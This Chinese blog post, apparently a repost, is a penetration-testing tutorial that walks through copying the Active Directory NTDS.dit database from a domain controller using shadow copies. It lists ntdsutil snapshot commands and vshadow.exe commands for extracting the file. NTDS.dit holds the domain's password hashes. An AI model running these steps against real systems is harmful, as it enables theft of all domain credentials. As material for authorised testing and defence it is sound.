当前位置:   article > 正文

渗透测试——卷影复制服务下载NTDS.dit(拿到域控)_卷影复制工具

卷影复制工具

目录

NTDS.dit获取

方式一(卷影复制服务)相当于快照

方法二(利用工具vshadow工具,原理也是卷影)


NTDS.dit获取

在域控的情况下,由于ntds.dit在使用,所以它不能进行移动下载到桌面更不能拿出来,下面解释两种方式

方式一(卷影复制服务)相当于快照

 ntdsutil按步骤执行命令创建快照

  1. # 进入ntdsutil命令行
  2. ntdsutil
  3. # 进入快照
  4. snapshot
  5. # 激活 AD DS 实例
  6. activate instance ntds
  7. create
  8. mount {GUID}
  9. copy C:\$SNAP_202406162052_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds.dit #可用可不用
  10. # copy 完之后再执行快照删除操作
  11. unmount {GUID}
  12. del {GUID}

 出现和C盘一样的快照,这样就可以进快照获取ntds.dit了

方法二(利用工具vshadow工具,原理也是卷影)

  1. vshadow.exe -p -nw C:
  2. 参数说明:
  3. -p persistent,备份操作,重启系统不会删除
  4. -nw no writers,用来提高创建速度
  5. C: 对应c盘

 记住这三信息Shadow copy device name、SnapshotSetID、SNAPSHOT ID

copy [Shadow copy device name]\windows\ntds\ntds.dit c:\ntds.dit

 成功获取到,可以进行下载

  1. vshadow -dx={SnapshotSetID}
  2. vshadow -ds={SNAPSHOT ID}

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Li_阴宅/article/detail/863499
推荐阅读
相关标签
  

闽ICP备14008679号